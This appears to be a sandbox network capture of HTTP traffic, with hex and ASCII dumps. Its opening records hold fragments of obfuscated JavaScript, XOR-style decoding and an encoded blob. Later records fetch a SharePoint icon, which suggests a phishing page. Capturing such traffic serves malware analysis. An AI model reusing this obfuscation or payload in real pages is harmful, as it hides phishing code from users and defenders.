2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 79 3b 77 68 69 6c 65 28 4c 78 62 79 3c 28 30 78 31 30 35 46 30 2d 30 6f 32 30 32 37 31 32 29 29 7b 73 77 69 74 63 68 28 4c 78 62 79 29 7b 63 61 73 65 20 28 30 6f 36 30 30 31 32 33 25 30 78 31 30 30 31 36 29 3a 4c 78 62 79 3d 28 36 38 37 37 36 2d 30 6f 32 30 36 32 31 35 29 3b 7b 72 61 6a 79 5e 3d 28 50 43 67 79 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 35 64 79 29 2a 28 31 35 36 35 38 37 33 34 5e 30 4f 37 33 35 36 37 33 35 34 29 2b 50 43 67 79 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 35 64 79 3e 3e 3e 28 30 78 34 41 35 44 30 43 45 26 30 4f 33 32 30 34 32 33 34 32 34 29 29 29 5e 39 34 34 39 36 35 35 37 34 3b 7d 62 72 65 61 6b 3b 63 61 73 65 20 28 30 6f 32 30 35 32 31 34 2d 36 38 32 30 39 29 3a 4c 78 62 79 3d 28 30 4f 33 31 35 33 30 35 30 35 36 33 2d 30 78 31 39 Data Ascii: y;while(Lxby<(0x105F0-0o202712)){switch(Lxby){case (0o600123%0x10016):Lxby=(68776-0o206215);{rajy^=(PCgy.charCodeAt(n5dy)*(15658734^0O73567354)+PCgy.charCodeAt(n5dy>>>(0x4A5D0CE&0O320423424)))^944965574;}break;case (0o205214-68209):Lxby=(0O3153050563-0x19
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 3c 28 30 78 31 30 33 46 43 2d 30 6f 32 30 31 37 33 32 29 29 73 77 69 74 63 68 28 62 55 32 79 29 7b 63 61 73 65 20 28 30 78 31 30 35 32 38 2d 30 6f 32 30 32 34 30 37 29 3a 62 55 32 79 3d 44 70 79 79 3e 3d 62 53 76 79 2e 6c 65 6e 67 74 68 3f 28 30 6f 36 30 30 31 31 34 25 30 78 31 30 30 31 35 29 3a 28 30 78 33 30 30 38 38 25 30 6f 32 30 30 30 34 32 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 28 30 6f 34 30 30 31 30 33 25 36 35 35 36 33 29 3a 62 55 32 79 3d 28 36 37 39 31 36 2d 30 6f 32 30 34 34 35 32 29 3b 7b 44 70 79 79 3d 28 30 78 32 31 37 38 36 25 33 29 3b 7d 62 72 65 61 6b 3b 7d 7d 62 72 65 61 6b 3b 63 61 73 65 20 28 30 4f 33 31 35 33 30 35 30 35 36 33 2d 30 78 31 39 41 43 35 31 36 42 29 3a 7a 6b 74 79 3d 7a 6d 30 79 3c 48 75 44 79 2e 6c 65 6e 67 74 68 3f 28 Data Ascii: <(0x103FC-0o201732))switch(bU2y){case (0x10528-0o202407):bU2y=Dpyy>=bSvy.length?(0o600114%0x10015):(0x30088%0o200042);break;case (0o400103%65563):bU2y=(67916-0o204452);{Dpyy=(0x21786%3);}break;}}break;case (0O3153050563-0x19AC516B):zkty=zm0y<HuDy.length?(
2024-05-10 19:31:20 UTC	254	IN	Data Raw: 30 45 25 30 30 25 30 33 25 35 45 4c 4c 48 4c 31 25 31 37 25 30 45 25 30 33 4d 4c 4a 25 31 39 25 30 37 25 30 44 25 31 38 25 31 35 25 31 31 25 30 43 25 30 43 25 30 41 41 25 31 36 43 25 31 32 25 31 43 4d 4a 25 31 46 25 31 33 25 31 44 25 30 32 25 30 33 25 31 37 25 30 42 43 43 3d 25 30 44 46 46 51 56 44 25 31 39 25 31 33 25 31 45 3d 39 4b 2d 25 30 31 59 49 49 4b 4b 42 54 44 4d 5a 25 31 45 25 30 33 25 31 38 25 30 36 25 31 31 25 30 41 25 30 42 25 30 46 58 25 33 45 25 30 35 53 25 31 44 4b 4d 25 31 41 25 30 41 25 31 33 25 30 32 25 31 30 25 31 37 25 30 44 44 25 31 37 41 3b 25 30 31 4d 4c 48 28 25 31 35 4f 25 30 31 25 35 45 4c 4e 25 30 39 25 32 35 25 30 35 25 30 41 25 35 45 5f 4e 29 25 30 42 32 25 31 35 50 5f 25 30 42 25 30 33 25 31 30 25 30 44 25 30 37 25 31 35 Data Ascii: 0E%00%03%5ELLHL1%17%0E%03MLJ%19%07%0D%18%15%11%0C%0C%0AA%16C%12%1CMJ%1F%13%1D%02%03%17%0BCC=%0DFFQVD%19%13%1E=9K-%01YIIKKBTDMZ%1E%03%18%06%11%0A%0B%0FX%3E%05S%1DKM%1A%0A%13%02%10%17%0DD%17A;%01MLH(%15O%01%5ELN%09%25%05%0A%5E_N)%0B2%15P_%0B%03%10%0D%07%15
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 25 31 31 25 31 39 25 31 38 45 25 30 46 53 25 35 43 25 31 39 50 5f 25 30 44 25 31 37 25 30 30 25 31 37 25 31 31 25 31 33 25 31 36 56 25 35 45 44 25 33 45 25 33 45 4f 3a 25 32 35 5f 2d 4e 44 48 3f 25 33 43 53 57 25 35 44 25 33 45 38 48 45 4a 23 2b 2b 25 31 38 25 30 33 25 31 36 25 30 41 25 30 32 25 30 43 25 31 46 25 31 39 25 30 42 45 25 30 39 56 5c 27 25 30 31 25 35 45 5f 25 31 45 25 31 37 25 30 36 25 31 30 25 31 34 25 30 41 25 31 38 56 31 2f 30 25 31 44 49 51 25 35 44 25 32 32 25 31 37 50 25 31 37 4c 48 53 25 31 34 3b 30 25 31 32 4b 4d 4a 2c 25 33 43 25 32 35 25 31 43 4d 4a 4f 35 25 30 30 31 25 30 30 4d 4c 48 2c 25 30 41 21 25 30 30 25 35 45 4c 4e 25 31 35 25 30 30 33 25 30 30 25 35 45 5f 4e 29 25 31 33 57 25 31 37 50 5f 25 30 42 25 30 33 25 31 30 25 30 44 Data Ascii: %11%19%18E%0FS%5C%19P_%0D%17%00%17%11%13%16V%5ED%3E%3EO:%25_-NDH?%3CSW%5D%3E8HEJ#++%18%03%16%0A%02%0C%1F%19%0BE%09V\'%01%5E_%1E%17%06%10%14%0A%18V1/0%1DIQ%5D%22%17P%17LHS%14;0%12KMJ,%3C%25%1CMJO5%001%00MLH,%0A!%00%5ELN%15%003%00%5E_N)%13W%17P_%0B%03%10%0D
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 46 25 31 44 54 52 56 53 49 5f 4d 25 30 37 25 31 37 25 30 36 25 30 35 25 30 41 43 25 30 42 25 30 42 25 30 37 25 31 37 25 30 36 25 30 35 25 30 41 43 25 30 42 25 30 34 25 30 30 25 31 31 25 31 36 25 31 36 25 30 46 58 25 32 32 25 30 36 25 31 43 25 31 31 58 25 31 39 25 30 37 25 30 44 25 31 38 25 31 35 25 31 31 25 30 43 25 30 43 25 30 41 41 25 30 32 25 31 44 25 30 32 25 31 43 4d 4a 25 31 46 25 31 33 25 31 44 25 30 32 25 30 33 25 31 37 25 30 42 43 4c 3a 25 32 35 2d 25 31 43 32 51 25 31 34 4c 48 25 32 35 25 35 44 2d 38 4c 38 25 30 32 5c 27 36 25 30 32 25 35 45 4c 38 25 31 45 25 30 32 25 31 34 25 31 36 25 31 35 25 30 32 25 30 43 25 30 41 25 30 44 44 25 31 42 25 31 35 46 25 30 46 4d 4c 25 31 38 25 31 36 25 30 34 25 30 43 25 30 33 25 30 34 25 30 42 45 33 25 31 37 23 Data Ascii: F%1DTRVSI_M%07%17%06%05%0AC%0B%0B%07%17%06%05%0AC%0B%04%00%11%16%16%0FX%22%06%1C%11X%19%07%0D%18%15%11%0C%0C%0AA%02%1D%02%1CMJ%1F%13%1D%02%03%17%0BCL:%25-%1C2Q%14LH%25%5D-8L8%02\'6%02%5EL8%1E%02%14%16%15%02%0C%0A%0DD%1B%15F%0FML%18%16%04%0C%03%04%0BE3%17#
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 31 38 25 31 36 25 30 34 25 30 43 25 30 33 25 30 34 25 30 42 45 4b 4f 4a 23 25 35 44 2d 38 38 38 4f 3a 25 32 35 2b 25 35 44 4d 4e 48 3f 4a 23 2b 2b 25 33 45 4e 38 39 25 33 43 51 5f 25 35 44 4d 4e 38 39 4a 59 25 35 44 2d 38 4c 25 31 45 25 30 32 25 31 34 25 31 36 25 31 35 25 30 32 25 30 43 25 30 41 25 30 44 44 25 30 46 25 32 32 35 25 30 31 4d 4c 25 31 38 25 31 36 25 30 34 25 30 43 25 30 33 25 30 34 25 30 42 45 4b 4c 4a 59 25 35 44 2d 38 4e 42 4f 3a 25 32 35 5f 25 35 43 4d 35 25 30 30 25 30 38 25 31 33 50 5f 5f 4c 4e 4b 4f 3a 25 32 35 25 35 44 57 4e 25 33 45 25 33 45 4d 25 31 43 25 31 45 25 30 33 25 31 38 25 30 36 25 31 31 25 30 41 25 30 42 25 30 46 58 26 25 30 31 23 25 31 32 4b 4d 25 31 41 25 30 41 25 31 33 25 30 32 25 31 30 25 31 37 25 30 44 44 49 59 2d 2b Data Ascii: 18%16%04%0C%03%04%0BEKOJ#%5D-888O:%25+%5DMNH?J#++%3EN89%3CQ_%5DMN89JY%5D-8L%1E%02%14%16%15%02%0C%0A%0DD%0F%225%01ML%18%16%04%0C%03%04%0BEKLJY%5D-8NBO:%25_%5CM5%00%08%13P__LNKO:%25%5DWN%3E%3EM%1C%1E%03%18%06%11%0A%0B%0FX&%01#%12KM%1A%0A%13%02%10%17%0DDIY-+
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 46 25 31 33 25 31 44 25 30 32 25 30 33 25 31 37 25 30 42 43 30 25 31 42 25 31 43 25 30 31 2d 25 30 33 37 39 25 31 33 25 33 43 43 25 30 42 25 31 30 25 31 30 25 30 42 25 30 30 25 31 30 25 30 38 25 31 37 25 31 38 56 25 31 46 25 30 30 30 25 31 33 49 51 25 30 44 25 30 34 25 30 30 25 31 31 25 31 36 25 31 36 25 30 46 58 25 35 45 25 32 32 21 25 30 44 25 31 42 4c 48 51 25 35 44 2d 38 25 31 38 25 30 35 25 31 31 25 30 46 25 31 42 25 30 32 25 31 46 25 30 41 25 30 42 43 25 30 36 2c 2d 25 30 31 25 35 45 4c 25 31 45 25 31 31 25 30 31 25 31 35 25 30 44 25 30 34 25 31 38 45 4d 25 30 39 54 59 25 30 30 25 35 45 5f 4c 25 33 45 25 30 39 29 25 31 31 25 30 44 25 35 45 5f 38 4d 4a 25 31 39 25 30 37 25 30 44 25 31 38 25 31 35 25 31 31 25 30 43 25 30 43 25 30 41 41 25 30 45 4f 3b Data Ascii: F%13%1D%02%03%17%0BC0%1B%1C%01-%0379%13%3CC%0B%10%10%0B%00%10%08%17%18V%1F%000%13IQ%0D%04%00%11%16%16%0FX%5E%22!%0D%1BLHQ%5D-8%18%05%11%0F%1B%02%1F%0A%0BC%06,-%01%5EL%1E%11%01%15%0D%04%18EM%09TY%00%5E_L%3E%09)%11%0D%5E_8MJ%19%07%0D%18%15%11%0C%0C%0AA%0EO;
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 30 42 25 35 45 5f 4e 35 25 30 45 54 25 31 35 50 5f 25 35 44 31 25 30 39 25 31 36 25 31 37 49 51 25 35 44 25 31 43 34 25 31 31 25 31 35 4c 48 25 30 35 25 31 30 25 30 33 25 30 42 25 30 36 25 31 37 25 30 44 25 30 45 25 31 36 56 3a 25 31 31 52 25 31 34 4c 48 25 30 33 25 30 34 25 31 33 25 31 31 25 31 30 25 31 31 25 30 41 41 50 26 25 30 37 51 25 31 30 4b 4d 48 53 2d 2b 25 31 38 25 30 33 25 31 36 25 30 41 25 30 32 25 30 43 25 31 46 25 31 39 25 30 42 45 25 30 44 55 58 25 30 46 25 35 45 5f 25 31 45 31 25 31 39 25 30 30 25 31 36 45 2d 2b 25 35 45 25 30 36 25 30 43 25 30 41 25 31 32 25 30 43 56 25 31 38 56 25 32 32 25 31 42 59 25 31 33 4a 25 31 37 25 30 31 4d 4c 58 25 30 37 25 30 45 25 31 36 25 30 35 25 30 32 45 35 25 32 32 2e 25 31 39 45 25 30 30 2c 52 25 31 31 4b Data Ascii: 0B%5E_N5%0ET%15P_%5D1%09%16%17IQ%5D%1C4%11%15LH%05%10%03%0B%06%17%0D%0E%16V:%11R%14LH%03%04%13%11%10%11%0AAP&%07Q%10KMHS-+%18%03%16%0A%02%0C%1F%19%0BE%0DUX%0F%5E_%1E1%19%00%16E-+%5E%06%0C%0A%12%0CV%18V%22%1BY%13J%17%01MLX%07%0E%16%05%02E5%22.%19E%00,R%11K
2024-05-10 19:31:20 UTC	1369	IN	Data Raw: 30 30 58 25 30 37 24 25 30 45 25 31 37 44 25 31 30 3a 25 30 41 25 31 33 38 28 25 31 37 3d 25 30 45 2b 5a 4d 53 25 30 42 50 48 46 46 54 57 55 41 51 25 30 30 47 46 55 54 52 4d 25 35 42 50 46 25 31 39 54 55 53 54 53 4f 45 53 55 25 31 44 52 54 51 4a 43 5f 25 35 45 25 30 37 25 31 31 25 30 31 25 30 30 25 31 33 4d 25 31 35 25 30 34 25 31 36 25 30 36 44 49 48 25 31 39 40 55 55 52 56 50 25 35 44 46 25 30 45 54 55 53 55 57 51 4c 25 33 45 25 30 43 25 31 37 25 31 35 59 49 48 25 31 39 44 55 56 53 57 51 55 40 41 55 25 35 44 50 4d 5a 25 31 41 31 25 31 43 25 31 33 4e 48 5f 25 30 33 25 30 41 25 31 33 25 31 37 25 30 45 25 35 45 25 30 30 25 30 35 25 31 32 25 31 44 56 25 35 45 55 25 30 41 51 54 55 4c 42 42 48 55 25 31 42 55 51 41 47 44 4c 5f 2b 25 30 44 25 31 33 25 30 45 4b Data Ascii: 00X%07$%0E%17D%10:%0A%138(%17=%0E+ZMS%0BPHFFTWUAQ%00GFUTRM%5BPF%19TUSTSOESU%1DRTQJC_%5E%07%11%01%00%13M%15%04%16%06DIH%19@UURVP%5DF%0ETUSUWQL%3E%0C%17%15YIH%19DUVSWQU@AU%5DPMZ%1A1%1C%13NH_%03%0A%13%17%0E%5E%00%05%12%1DV%5EU%0AQTULBBHU%1BUQAGDL_+%0D%13%0EK

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:19 UTC	564	OUT	GET /ZU3tO.png,%20&width=450 HTTP/1.1 Host: i.stack.imgur.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:20 UTC	519	IN	HTTP/1.1 200 OK Connection: close Content-Length: 8514 Cache-Control: max-age=315360000 Content-Type: image/png ETag: "51f7db54af24c4acfbe56682813c7401" Expires: Thu, 31 Dec 2037 23:55:55 GMT Last-Modified: Mon, 13 Feb 2017 05:29:55 GMT Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 155098 Date: Fri, 10 May 2024 19:31:20 GMT X-Served-By: cache-iad-kcgs7200052-IAD, cache-chi-kigq8000153-CHI X-Cache: HIT, HIT X-Cache-Hits: 29, 0 X-Timer: S1715369480.002403,VS0,VE1 Server: cat factory 1.0
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 d0 00 00 03 e8 01 03 00 00 00 bc 90 f7 e9 00 00 00 06 50 4c 54 45 ff ff ff 09 71 ce 10 eb 4f f1 00 00 20 f7 49 44 41 54 78 da ed 5d bd b2 ec 4a 75 1e 2d 54 b7 84 8b 40 c6 04 ce dc a6 b0 cb 21 8f 20 5c 37 20 bc 8f 80 df 82 08 da 19 a1 9f c0 45 ee 04 67 64 f4 23 10 38 20 a0 0a 85 04 b7 6c 05 2e a3 a2 84 e4 7b f6 d9 3f d2 a8 7f d6 ea 5e dd 92 66 56 43 dd 73 ce de 33 dd fd ad ef 5b 7f 3d 1a e9 76 3b e3 e8 4a 2c 02 b7 a7 1d 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 79 47 2b ac 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 fd 44 43 0b eb 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b f4 c4 d1 09 eb 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 Data Ascii: PNGIHDRPLTEqO IDATx]Ju-T@! \7 Egd#8 l.{?^fVCs3[=v;J,]t.@yG+t.@]t.@DC]t.@]t.@]]t.@
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: e3 da e1 ca e2 96 93 66 f2 5c 1d 97 ff 01 63 a7 c1 ed e6 65 58 af 88 91 17 30 31 b5 da ce db f0 79 41 38 ea e4 6b a5 9b 62 7e 48 5b 23 42 bc 35 bb 59 b8 12 09 24 4e d5 66 53 40 53 e3 33 a7 ca cf 7a 6c 7b db a0 d4 c1 7f 11 b1 7a c1 a7 ec ec 00 01 63 75 fb ab ab 25 f4 da e3 70 87 97 34 5d 81 18 11 0b bd 0e 6d bd b3 8a a5 f6 64 88 82 b7 20 6a 10 69 34 8f c5 35 f9 d7 2d 12 4b e9 e4 66 5f bd 63 ec 68 3b 76 e4 8a 13 7a 7d 8e 5b 85 b7 89 32 4d 0d 73 75 15 65 71 44 91 7b 54 98 63 0f 44 15 46 be 15 34 94 83 8e 5a a7 ac fd 02 bd 4a 0a 74 da 1a b4 e2 a2 51 9d 29 f5 76 b6 3d 41 9a 93 b9 cd ab e2 62 4f 4b 7b b9 4a f0 1b 40 54 c0 fa 76 f8 50 2b d3 7c 83 b4 ab 3e 44 d2 f1 f9 7a e7 93 cd 2f f8 0f 1f a8 5b 6f 3b a6 70 f4 19 7a 5d a0 9e ed f0 d4 16 31 61 fe 1a be 61 50 79 Data Ascii: f\ceX01yA8kb~H[#B5Y$NfS@S3zl{zcu%p4]md ji45-Kf_ch;vz}[2MsueqD{TcDF4ZJtQ)v=AbOK{J@TvP+\|>Dz/[o;pz]1aaPy
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: 23 0b 85 8d 64 9b d4 8e 16 30 b9 40 ef 3e 51 42 85 4f fa 79 77 da a5 16 05 bf 43 56 07 ca ad 30 10 e5 42 d3 6c 78 ab 30 aa 5f 5d 62 93 e1 d1 23 ed cb 66 ab d5 be db 9d 84 1b 0b 74 ef e1 08 82 ab bf 4d 39 de a8 79 b0 bb fc a8 f1 09 72 77 f4 58 d9 f7 54 df 22 85 bf 35 e0 f7 09 ed 51 f7 be 5c 1d ef af 36 1b c2 c7 02 b8 69 14 a9 b4 6f 52 a2 ca bb ad 49 01 e2 e5 6b dd 35 e2 09 81 e0 2b 00 f4 de 62 35 a1 2b b5 ac de 51 2e 4f 69 ba e8 c6 0e c3 24 dc ba ce 5f 74 35 28 7e ba 7f c4 e9 9d 98 ba 15 e9 45 15 49 88 80 2d aa 29 7b 06 d4 8b 51 51 31 b2 89 c7 44 e7 e8 13 d9 6e 13 81 50 fb 04 fb 05 e9 10 3c 13 51 de cf a1 d5 26 bb 76 9f ff d3 ee 01 2a 0b 74 bd a7 15 6e 8e 2b 9b 5b f7 1d 51 5a 1a 4f 84 78 49 bb 9e b1 42 b2 0a 15 55 84 da aa a6 5f be 7b 52 ae af b8 55 c8 a0 Data Ascii: #d0@>QBOywCV0Blx0_]b#ftM9yrwXT"5Q\6ioRIk5+b5+Q.Oi$_t5(~EI-){QQ1DnP<Q&v*tn+[QZOxIBU_{RU
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: ad 01 d7 77 f4 db ad 3f cb 11 c0 91 a3 7d ff a3 09 d6 79 b1 d0 2b 4f 5e a8 ae 61 1f ec 4d 94 1e 6c 40 04 eb f0 08 8e 54 e7 de 62 5b 30 76 52 61 74 ff f2 d0 25 8d 33 d0 e9 c0 03 57 ca ea af 39 c0 30 14 e8 d3 79 fa eb e4 f1 8b 2f 39 58 f7 54 c1 e7 4d 1b 90 f0 58 d1 f8 e4 bd 9c 22 c8 ab 07 0e 73 7e 6e da f6 91 23 fc e4 b5 0b 74 59 a1 17 6f 88 06 fc a1 58 f5 4b 98 4e c1 50 57 7e c9 bf 83 e6 f6 7c e3 93 32 7e fa 9f cf 78 40 f5 79 7c 95 ef 26 57 a7 1e f3 b2 1c 13 e1 87 13 80 ff f3 ed 49 05 3f 7e 73 cf 5f 4e e8 c6 ad af c3 a2 99 73 47 c3 ed 24 c9 ad f8 30 09 4d ab be 38 76 9d d1 d7 d5 b9 81 7b 59 ef 8f 28 ae 39 87 af 45 fc af db 93 46 f8 f9 13 ed c0 3d e7 09 94 8c 11 c4 f0 ac ac bf 0c a0 5b cc 1c 9a 90 f3 40 bf 90 ae d3 2a b9 cf 91 16 72 2f 52 be 54 41 78 fa 68 Data Ascii: w?}y+O^aMl@Tb[0vRat%3W90y/9XTMX"s~n#tYoXKNPW~\|2~x@y\|&WI?~s_NsG$0M8v{Y(9EF=[@*r/RTAxh
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: cc 2c e7 15 83 2b 4f 2f 7b 40 3d da 0a e0 0b ee 3d d2 9c 03 be 9e d0 81 7c b2 fe fd 64 48 fa 7e 6b 88 06 5f c8 98 3f 76 07 7e 74 7f 71 86 d3 3e fc d5 5f bd c7 37 f1 e4 eb a8 5c 60 90 d5 dc b0 06 d0 3b 26 30 04 bd 44 ec 38 2e d2 0f 23 f2 9d 60 5b c9 dc ec 97 75 0d 8e 7f ac cf 3e 06 37 42 b3 32 09 85 69 fd 73 6c 01 4d b1 b8 9d f5 d5 be 46 df a7 cc fd ed 5c 43 ef 15 a9 df fe f8 b4 ef 65 c1 08 7e a4 85 e3 71 1b fd 27 77 16 9f 82 ca 1e 63 7d dc 84 7c 7c ba 67 7d 72 3b 9d b6 97 c7 6f bf 19 9c 46 b0 7d e6 14 bc d6 65 0a d7 48 9c 9f ec 82 ab 90 98 d7 cd f4 62 35 e4 b2 c9 b0 63 7c d0 f6 7e 39 66 bc 7b c9 12 9c 67 b9 a3 f1 fd bd ba bf 83 6e 6c 01 da d0 76 eb 82 fb b1 cf b1 0f 5e 1a f0 fa 6a 6a ae db 46 9c f9 9d c9 ed 31 7a bf f3 2d 70 88 7c 76 07 b2 3e 50 9f f4 c8 Data Ascii: ,+O/{@==\|dH~k_?v~tq>_7\`;&0D8.#`[u>7B2islMF\Ce~q'wc}\|\|g}r;oF}eHb5c\|~9f{gnlv^jjF1z-p\|v>P
2024-05-10 19:31:20 UTC	1371	IN	Data Raw: b0 c4 bc 35 2b f4 95 d5 3f 9e 42 b3 69 e5 ad 99 77 f1 90 d9 db 1e d1 10 57 78 95 62 1d 57 65 10 62 c2 fa e1 ef a8 e2 c2 24 41 9f a3 08 7f 67 b2 8f d9 20 c6 54 a8 38 b2 04 a1 cf 11 cb 1b 82 b9 34 7e f7 8b 7d fa d8 bb a7 97 12 bc 4e cb 95 21 91 71 44 4d 78 35 eb 94 e6 79 79 8c f4 f1 4b 4d 7e 27 7b 98 9b 4a 63 3f b6 90 d5 0c 4d fb b4 91 6a 5f 12 a1 b1 3c cb e5 1d fa 98 e7 93 05 86 59 67 5c 4c 5b a2 a4 05 0c ba 8e c6 38 78 44 32 dd 22 6e 1c 4c 0a a9 60 7f 49 cf 76 1c 81 34 dc 4f b3 84 87 31 6f 35 37 30 be 6d c0 9d 50 98 b5 d6 fa 58 e5 51 a0 4f 91 61 e6 a4 6d 11 a4 ae c8 9e ec 75 29 f1 95 6e 5f e2 a4 d2 e7 90 55 32 f4 3e 73 4c 70 86 2f 9d 5a ce 42 50 65 c5 2e 27 e8 d7 16 9a 98 a7 f5 b0 3e b3 b1 cb 35 a6 dc f3 20 04 3f 7f 26 e2 57 59 c3 6d 8a 75 35 f6 05 e3 1e Data Ascii: 5+?BiwWxbWeb$Ag T84~}N!qDMx5yyKM~'{Jc?Mj_<Yg\L[8xD2"nL`Iv4O1o570mPXQOamu)n_U2>sLp/ZBPe.'>5 ?&WYmu5
2024-05-10 19:31:20 UTC	288	IN	Data Raw: 40 7f 0a e8 b3 b0 2e d0 05 fa a3 42 9f 85 f5 72 45 4d 14 f4 51 04 2f d0 d9 87 11 d6 05 7a a6 36 5e 58 17 e8 02 5d a0 3f 78 33 2b ac 0b 74 81 fe a8 bd 9a b0 2e d0 05 ba 40 3f 74 8c c2 ba 40 cf 9e 00 85 75 81 2e d0 05 ba 40 17 e8 02 fd 90 fe f2 89 58 1f 44 f0 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 3d 03 f4 45 58 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 fd a8 0a 5a 58 17 e8 02 5d a0 1f 38 66 61 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 7a e6 b1 08 eb 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d 46 da 50 c2 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 2e d0 05 ba 40 17 e8 02 5d a0 0b 74 81 Data Ascii: @.BrEMQ/z6^X]?x3+t.@?t@u.@XD]t.@=EX]t.@ZX]8fa]t.@]t.@]t.z]t.@]t.@]t.@]FP@]t.@]t.@]t

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:20 UTC	484	OUT	GET /icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png HTTP/1.1 Host: icons.iconarchive.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:21 UTC	690	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:21 GMT Content-Type: image/png Content-Length: 4033 Connection: close Last-Modified: Tue, 07 Feb 2023 10:06:28 GMT ETag: "63e222a4-fc1" Cache-Control: max-age=5356800 CF-Cache-Status: HIT Age: 1464 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6yowMtXkMrQ9hl44lOR6UTQgUB0z4OpK5uGJJyLaRhaUTUDAR9DoRiCt31D58Any%2B%2BjViZOn9oWlJ6sDmafa7QioySkvMoKmERIzler3DBV5NNotV9Zt5bqcNJKYLedvugOAMX%2F0Ls%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5958dc1f02c8-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:21 UTC	679	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 03 00 00 00 6b ac 58 54 00 00 03 00 50 4c 54 45 47 70 4c 00 6c b8 00 6a b4 00 6c b7 00 52 8f 00 52 8f 00 67 b3 00 5f a5 00 6f c0 00 72 c6 00 67 b3 00 69 b5 00 69 b4 00 67 b3 00 6c b9 00 6c b8 00 6e b9 00 67 b3 00 68 b2 00 6d bc 00 67 b3 00 68 b2 00 67 b3 00 6d bb 00 67 b3 00 67 b3 00 67 b3 00 72 c5 00 68 b2 00 67 b3 00 6c b9 00 69 b2 00 72 c6 00 68 b2 00 68 b2 00 72 c6 00 67 b3 00 67 b3 00 72 c6 00 6a b1 00 72 c5 00 72 c6 00 67 b3 00 72 c6 00 67 b3 00 69 b1 00 69 b1 00 67 b3 00 67 b3 00 67 b3 00 68 b2 00 72 c6 00 68 b3 00 67 b3 00 69 b2 00 69 b2 00 68 b2 00 68 b3 00 6f c0 00 72 c6 00 72 c6 00 68 b2 00 68 b2 00 68 b2 00 5c 9e 00 72 c6 00 72 c6 00 72 c6 00 72 c6 00 72 c6 00 72 c6 00 Data Ascii: PNGIHDRkXTPLTEGpLljlRRg_orgiigllnghmghgmgggrhglirhhrggrjrrgrgiiggghrhgiihhorrhhh\rrrrrr
2024-05-10 19:31:21 UTC	1369	IN	Data Raw: fe fe fe ff 4c 9a d7 73 b0 df 6a ab de 0d 75 c8 e5 f0 f9 f6 fa fd 62 a7 dc ba d8 ef 28 86 ce f1 f7 fc 4f 9d d7 da ea f7 b4 d5 ee 93 c2 e7 a6 cd eb cd e3 f4 5a a2 da 88 bc e4 8e c0 e6 5e a4 db 55 9e d8 67 a9 dd af d2 ed d0 e5 f5 79 b4 e0 18 7e cb 3e 92 d3 84 ba e3 2e 8a d0 ad d1 ec 03 6e c5 e8 f2 fa 94 c4 e7 e0 ee f8 c8 e0 f3 ab db b4 ca e2 f3 e9 f3 fa e9 f2 fa ab d0 ec c0 db f1 00 66 b4 a3 6a 8d ff 00 00 00 a1 74 52 4e 53 00 0b 09 03 14 ea e3 16 ec e9 f9 0d 02 fc 13 06 16 ee 28 1f c2 5b d0 19 af c6 f5 2a ab d8 1c 4d f7 68 b2 be df b6 d0 49 24 de 88 ee cc 51 22 f2 d3 fe 81 fc 46 7d 2c 43 30 9e 10 56 b9 71 40 3c 07 92 51 fa d9 44 6d 9e 3b e9 96 34 84 